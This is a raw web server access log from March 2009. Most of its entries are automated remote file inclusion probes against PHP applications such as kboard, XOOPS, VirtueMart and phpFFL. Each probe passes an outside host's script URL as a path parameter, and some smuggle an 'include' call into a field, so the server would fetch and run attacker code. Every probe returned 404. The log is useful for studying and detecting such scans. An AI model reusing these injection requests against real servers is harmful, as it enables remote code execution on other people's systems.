77.221.130.2 - - [11/Mar/2009:05:07:39 -0500] "GET /logs/access_log.1228953600//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
77.221.130.2 - - [11/Mar/2009:05:10:23 -0500] "GET /logs/access_log.1228953600//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
77.221.130.2 - - [11/Mar/2009:05:10:32 -0500] "GET /logs/access_log.1230249600//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
61.63.90.81 - - [11/Mar/2009:05:11:41 -0500] "GET //index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
61.63.90.81 - - [11/Mar/2009:05:11:41 -0500] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
77.221.130.15 - - [11/Mar/2009:05:14:03 -0500] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
77.221.130.15 - - [11/Mar/2009:05:14:03 -0500] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
77.221.130.15 - - [11/Mar/2009:05:14:03 -0500] "GET /logs/access_log.1228608000//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
77.221.130.15 - - [11/Mar/2009:05:14:19 -0500] "GET /logs/access_log.1230249600//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
218.38.55.195 - - [11/Mar/2009:05:14:27 -0500] "GET //xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
218.38.55.195 - - [11/Mar/2009:05:14:27 -0500] "GET /logs/access_log.1233878400//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
218.38.55.195 - - [11/Mar/2009:05:14:27 -0500] "GET /logs//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
218.38.55.195 - - [11/Mar/2009:05:14:31 -0500] "GET /logs/access_log.1234483200//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
218.38.55.195 - - [11/Mar/2009:05:15:38 -0500] "GET /logs/access_log.1234051200//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
61.62.162.42 - - [11/Mar/2009:05:16:28 -0500] "GET /logs//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://zacs.ca/blm/images/banner.jpg?? HTTP/1.1" 404 330 "-""libwww-perl/5.803"
61.62.162.42 - - [11/Mar/2009:05:16:28 -0500] "GET /logs//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://zacs.ca/blm/images/banner.jpg?? HTTP/1.1" 404 330 "-""libwww-perl/5.803"
61.62.162.42 - - [11/Mar/2009:05:16:28 -0500] "GET //xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://zacs.ca/blm/images/banner.jpg?? HTTP/1.1" 404 325 "-""libwww-perl/5.803"
61.62.162.42 - - [11/Mar/2009:05:16:28 -0500] "GET //xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://zacs.ca/blm/images/banner.jpg?? HTTP/1.1" 404 325 "-""libwww-perl/5.803"
218.38.55.195 - - [11/Mar/2009:05:16:36 -0500] "GET /logs/access_log.1232236800//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
222.231.24.164 - - [11/Mar/2009:05:16:56 -0500] "GET /logs/access_log.1233878400//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://kbapt.co.kr/bbs/templates/id1.txt? HTTP/1.1" 404 352 "-""Mozilla/5.0"
222.231.24.164 - - [11/Mar/2009:05:16:57 -0500] "GET /logs//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://kbapt.co.kr/bbs/templates/id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
222.231.24.164 - - [11/Mar/2009:05:16:59 -0500] "GET //xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://kbapt.co.kr/bbs/templates/id1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
222.231.24.164 - - [11/Mar/2009:05:17:19 -0500] "GET /logs/access_log.1234483200//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://kbapt.co.kr/bbs/templates/id1.txt? HTTP/1.1" 404 352 "-""Mozilla/5.0"
222.231.24.164 - - [11/Mar/2009:05:19:58 -0500] "GET /logs/access_log.1234051200//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://kbapt.co.kr/bbs/templates/id1.txt? HTTP/1.1" 404 352 "-""Mozilla/5.0"
222.231.24.164 - - [11/Mar/2009:05:20:43 -0500] "GET /logs/access_log.1232236800//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://kbapt.co.kr/bbs/templates/id1.txt? HTTP/1.1" 404 352 "-""Mozilla/5.0"
211.220.195.71 - - [11/Mar/2009:05:21:17 -0500] "GET /logs/access_log.1234051200//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.tickledpinkscentsations.com/images/f1.gif?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
211.220.195.71 - - [11/Mar/2009:05:21:17 -0500] "GET /logs//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.tickledpinkscentsations.com/images/f1.gif?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
211.220.195.71 - - [11/Mar/2009:05:21:17 -0500] "GET //xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.tickledpinkscentsations.com/images/f1.gif?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
64.118.82.22 - - [11/Mar/2009:05:22:15 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.suntalent.com.tw//appserv/id???? HTTP/1.1" 404 348 "-""libwww-perl/5.810"
64.118.82.22 - - [11/Mar/2009:05:22:15 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.suntalent.com.tw//appserv/id???? HTTP/1.1" 404 343 "-""libwww-perl/5.810"
64.118.82.22 - - [11/Mar/2009:05:22:23 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.suntalent.com.tw//appserv/id???? HTTP/1.1" 404 348 "-""libwww-perl/5.810"
64.118.82.22 - - [11/Mar/2009:05:22:23 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.suntalent.com.tw//appserv/id???? HTTP/1.1" 404 343 "-""libwww-perl/5.810"
64.118.82.22 - - [11/Mar/2009:05:22:54 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.suntalent.com.tw//appserv/id???? HTTP/1.1" 404 348 "-""libwww-perl/5.810"
64.118.82.22 - - [11/Mar/2009:05:22:55 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.suntalent.com.tw//appserv/id???? HTTP/1.1" 404 343 "-""libwww-perl/5.810"
207.226.88.17 - - [11/Mar/2009:05:24:44 -0500] "GET /logs/errors.php?error=http://www.gosstroy.com/images/kampret.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
207.226.88.17 - - [11/Mar/2009:05:24:44 -0500] "GET /errors.php?error=http://www.gosstroy.com/images/kampret.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
61.63.90.81 - - [11/Mar/2009:05:26:08 -0500] "GET //xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
61.63.90.81 - - [11/Mar/2009:05:26:08 -0500] "GET /logs//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
58.227.193.198 - - [11/Mar/2009:05:26:48 -0500] "GET /logs/access_log.1232496000/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://ipteam.net//copyright.txt???? HTTP/1.1" 404 366 "-""Mozilla/5.0"
58.227.193.198 - - [11/Mar/2009:05:26:48 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://ipteam.net//copyright.txt???? HTTP/1.1" 404 344 "-""Mozilla/5.0"
58.227.193.198 - - [11/Mar/2009:05:26:48 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://ipteam.net//copyright.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
69.64.34.249 - - [11/Mar/2009:05:29:15 -0500] "GET //xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://oursoultvxq.com/bbs/data/vip/id2.txt???? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
69.64.34.249 - - [11/Mar/2009:05:29:15 -0500] "GET /logs//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://oursoultvxq.com/bbs/data/vip/id2.txt???? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
207.226.88.17 - - [11/Mar/2009:05:32:53 -0500] "GET /logs/errors.php?error=http://www.gosstroy.com/images/kampret.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
207.226.88.17 - - [11/Mar/2009:05:32:53 -0500] "GET /errors.php?error=http://www.gosstroy.com/images/kampret.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
64.118.82.22 - - [11/Mar/2009:05:33:20 -0500] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.suntalent.com.tw//appserv/id???? HTTP/1.1" 404 326 "-""libwww-perl/5.810"
64.118.82.22 - - [11/Mar/2009:05:33:20 -0500] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://www.suntalent.com.tw//appserv/id???? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
64.118.82.22 - - [11/Mar/2009:05:33:48 -0500] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.suntalent.com.tw//appserv/id???? HTTP/1.1" 404 326 "-""libwww-perl/5.810"
64.118.82.22 - - [11/Mar/2009:05:33:48 -0500] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://www.suntalent.com.tw//appserv/id???? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
64.118.82.22 - - [11/Mar/2009:05:33:49 -0500] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.suntalent.com.tw//appserv/id???? HTTP/1.1" 404 326 "-""libwww-perl/5.810"
64.118.82.22 - - [11/Mar/2009:05:33:49 -0500] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://www.suntalent.com.tw//appserv/id???? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
207.226.88.17 - - [11/Mar/2009:05:38:56 -0500] "GET /logs/errors.php?error=http://www.gosstroy.com/images/kampret.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
207.226.88.17 - - [11/Mar/2009:05:38:56 -0500] "GET /errors.php?error=http://www.gosstroy.com/images/kampret.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
207.226.88.17 - - [11/Mar/2009:05:40:40 -0500] "GET /logs/errors.php?error=http://www.gosstroy.com/images/kampret.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
207.226.88.17 - - [11/Mar/2009:05:40:40 -0500] "GET /errors.php?error=http://www.gosstroy.com/images/kampret.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
74.52.100.226 - - [11/Mar/2009:05:44:15 -0500] "GET //classes/adodbt/sql.php?classes_dir=http://www.bsdhz.ch//assets/media/Roseid.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.810"
74.52.100.226 - - [11/Mar/2009:05:44:16 -0500] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.bsdhz.ch//assets/media/Roseid.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.810"
78.40.226.135 - - [11/Mar/2009:05:48:57 -0500] "GET //include/admin.lib.inc.php?site_path=http://roadone.net//board//data/photo/db/z6id.txt?%0D?? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
78.40.226.135 - - [11/Mar/2009:05:48:57 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://roadone.net//board//data/photo/db/z6id.txt?%0D?? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
67.18.151.242 - - [11/Mar/2009:05:49:04 -0500] "GET /logs/main.php?pagina=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
67.18.151.242 - - [11/Mar/2009:05:49:04 -0500] "GET /main.php?pagina=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
67.18.151.242 - - [11/Mar/2009:05:49:04 -0500] "GET /logs/access_log.1234051200/main.php?pagina=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
211.214.160.165 - - [11/Mar/2009:05:49:57 -0500] "GET //xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
211.214.160.165 - - [11/Mar/2009:05:49:57 -0500] "GET /logs//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
211.214.160.165 - - [11/Mar/2009:05:49:58 -0500] "GET /logs/access_log.1233187200//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
211.214.160.165 - - [11/Mar/2009:05:49:58 -0500] "GET /logs/access_log.1234483200//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
211.214.160.165 - - [11/Mar/2009:05:50:13 -0500] "GET /logs/access_log.1234051200//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
211.214.160.165 - - [11/Mar/2009:05:50:27 -0500] "GET /logs/access_log.1232236800//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
207.226.88.17 - - [11/Mar/2009:05:50:30 -0500] "GET /logs/errors.php?error=http://www.gosstroy.com/images/kampret.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
207.226.88.17 - - [11/Mar/2009:05:50:30 -0500] "GET /errors.php?error=http://www.gosstroy.com/images/kampret.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
67.18.151.242 - - [11/Mar/2009:05:50:34 -0500] "GET /main.php?pagina=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
67.18.151.242 - - [11/Mar/2009:05:50:34 -0500] "GET /logs/main.php?pagina=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
67.18.151.242 - - [11/Mar/2009:05:50:35 -0500] "GET /logs/access_log.1234051200/main.php?pagina=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
67.18.151.242 - - [11/Mar/2009:05:50:42 -0500] "GET /logs/access_log.1234828800/main.php?pagina=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
78.40.226.135 - - [11/Mar/2009:05:51:40 -0500] "GET /logs//include/admin.lib.inc.php?site_path=VuLneRaBillTy? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
78.40.226.135 - - [11/Mar/2009:05:51:41 -0500] "GET //include/admin.lib.inc.php?site_path=VuLneRaBillTy? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
218.38.55.195 - - [11/Mar/2009:05:51:57 -0500] "GET /main.php?pagina=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
218.38.55.195 - - [11/Mar/2009:05:51:57 -0500] "GET /logs/access_log.1234051200/main.php?pagina=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
218.38.55.195 - - [11/Mar/2009:05:51:57 -0500] "GET /logs/main.php?pagina=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
74.205.119.226 - - [11/Mar/2009:05:52:04 -0500] "GET /main.php?pagina=http://roadone.net//board/data/photo/db/fatal1.txt???? HTTP/1.1" 404 291 "-""Mozilla/5.0"
74.205.119.226 - - [11/Mar/2009:05:52:04 -0500] "GET /logs/main.php?pagina=http://roadone.net//board/data/photo/db/fatal1.txt???? HTTP/1.1" 404 296 "-""Mozilla/5.0"
74.205.119.226 - - [11/Mar/2009:05:52:04 -0500] "GET /logs/access_log.1234051200/main.php?pagina=http://roadone.net//board/data/photo/db/fatal1.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
218.38.55.195 - - [11/Mar/2009:05:52:14 -0500] "GET /logs/access_log.1234828800/main.php?pagina=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
207.226.88.17 - - [11/Mar/2009:05:57:18 -0500] "GET /logs/errors.php?error=http://www.gosstroy.com/images/kampret.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
207.226.88.17 - - [11/Mar/2009:05:57:18 -0500] "GET /errors.php?error=http://www.gosstroy.com/images/kampret.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
65.55.208.135 - - [11/Mar/2009:06:06:08 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.135 - - [11/Mar/2009:06:06:09 -0500] "GET /logs/access_log.1234310400 HTTP/1.1" 200 114287 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
69.65.122.96 - - [11/Mar/2009:06:07:38 -0500] "GET /logs//testheaderpage.php?rootSys=http://nachwuchs.fcc-supporters.de/images/Ilegalid.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
69.65.122.96 - - [11/Mar/2009:06:07:38 -0500] "GET //testheaderpage.php?rootSys=http://nachwuchs.fcc-supporters.de/images/Ilegalid.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
69.65.122.96 - - [11/Mar/2009:06:10:18 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://zacs.ca/blm/images/banner.jpg?? HTTP/1.1" 404 314 "-""libwww-perl/5.810"
69.65.122.96 - - [11/Mar/2009:06:10:18 -0500] "GET //include/admin.lib.inc.php?site_path=http://zacs.ca/blm/images/banner.jpg?? HTTP/1.1" 404 309 "-""libwww-perl/5.810"
69.65.122.96 - - [11/Mar/2009:06:10:19 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://zacs.ca/blm/images/banner.jpg?? HTTP/1.1" 404 314 "-""libwww-perl/5.810"
69.65.122.96 - - [11/Mar/2009:06:10:19 -0500] "GET //include/admin.lib.inc.php?site_path=http://zacs.ca/blm/images/banner.jpg?? HTTP/1.1" 404 309 "-""libwww-perl/5.810"
194.177.224.21 - - [11/Mar/2009:06:11:06 -0500] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://203.114.112.155/webboard1234/mic.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.79"
194.177.224.21 - - [11/Mar/2009:06:11:07 -0500] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://203.114.112.155/webboard1234/mic.txt?? HTTP/1.1" 404 337 "-""libwww-perl/5.79"
74.52.100.226 - - [11/Mar/2009:06:13:40 -0500] "GET /logs//testheaderpage.php?rootSys=http://www.bsdhz.ch//assets/media/Roseid.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
74.52.100.226 - - [11/Mar/2009:06:13:40 -0500] "GET //testheaderpage.php?rootSys=http://www.bsdhz.ch//assets/media/Roseid.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
207.226.88.17 - - [11/Mar/2009:06:15:56 -0500] "GET /logs/errors.php?error=http://www.gosstroy.com/images/kampret.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
207.226.88.17 - - [11/Mar/2009:06:15:56 -0500] "GET /errors.php?error=http://www.gosstroy.com/images/kampret.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
123.214.171.33 - - [11/Mar/2009:06:29:22 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.7777club.com/b1ttletX.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
123.214.171.33 - - [11/Mar/2009:06:29:23 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.7777club.com/b1ttletX.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
124.0.71.7 - - [11/Mar/2009:06:30:31 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.7777club.com/b1ttletX.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
124.0.71.7 - - [11/Mar/2009:06:30:31 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.7777club.com/b1ttletX.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
58.227.193.198 - - [11/Mar/2009:06:30:38 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://rubik.co.za/rss/osid6.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
58.227.193.198 - - [11/Mar/2009:06:30:38 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://rubik.co.za/rss/osid6.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
58.227.193.198 - - [11/Mar/2009:06:30:38 -0500] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://rubik.co.za/rss/osid6.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
58.227.193.198 - - [11/Mar/2009:06:31:36 -0500] "GET /logs/access_log.1228608000%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://rubik.co.za/rss/osid6.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
61.63.90.81 - - [11/Mar/2009:06:33:20 -0500] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
